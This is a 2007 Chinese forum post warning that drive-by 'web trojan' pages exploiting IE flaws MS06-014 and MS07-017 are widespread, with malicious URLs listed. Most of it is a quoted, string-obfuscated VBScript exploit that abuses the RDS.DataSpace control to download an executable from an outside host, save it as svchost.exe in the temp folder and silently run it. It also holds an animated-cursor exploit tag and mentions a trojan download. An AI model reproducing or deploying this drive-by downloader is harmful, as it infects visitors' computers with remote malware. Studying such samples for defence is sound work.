| yksoft1 |
2007-04-21 07:46 |
挂马,挂马,挂马。。。。到处都是ms06014,ms07004,ms07017...
http://s.gcuj.com/bd.htm?244001
<BODY style='CURSOR: url(http://s.gcuj.com/t.js)'>
07017
http://s.gcuj.com/1.htm
<SCRIPT language=VBScript>
on error resume next
fuckie = "http://t.gcuj.com/0.exe"
fname1="svchost.exe"
fname2="svchost.vbs"
Set df = document.createElement("o"&"b"&"j"&"e"&"c"&"t")
df.setAttribute "c"&"l"&"a"&"s"&"s"&"i"&"d", "c"&"l"&"s"&"id:"&"B"&"D"&"96"&"C5"&"56"&"-65"&"A3"&"-11"&"D0"&"-98"&"3A"&"-00"&"C04"&"FC2"&"9E"&"36"
str="Mic"&"ro"&"so"&"ft."&"X"&"M"&"L"&"HT"&"TP"
Set x = df.CreateObject(str,"")
a1="A"&"d"&"o"
a2="d"&"b."
a3="S"&"tr"
a4="e"&"am"
str5="A"&"d"&"o"&"d"&"b."&"S"&"tr"&"e"&"am"
set S = df.createobject(str5,"")
S.type = 1
str6="G"&"E"&"T"
x.Open str6, fuckie, False
x.Send
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
fname2= F.BuildPath(tmp,fname2)
set ts = F.OpenTextFile(fname2, 2, True)
ts.WriteLine "Set Shell = CreateObject(""Sh""&""ell""&"".App""&""lic""&""at""&""ion"")"
sql="Shell.ShellExecute"""+fname1+""","""","""",""o""&""p""&""e""&""n"",0"
ts.writeLine sql
ts.close
if F.FileExists(fname1)=true then
if F.FileExists(fname2)=true then
d3="She"&"ll."&"App"&"li"&"ca"&"tion"
set Q = df.createobject(d3,"")
dc="o"&"p"&"e"&"n"
Q.ShellExecute fname2,"","",dc,0
end if
End if
</SCRIPT>
06014
另外,golds7n的站上http://www.golds7n.cn/abc.htm也是个06014/07017混合网马
下载黑防鸽子 |
|
[attachment=53262]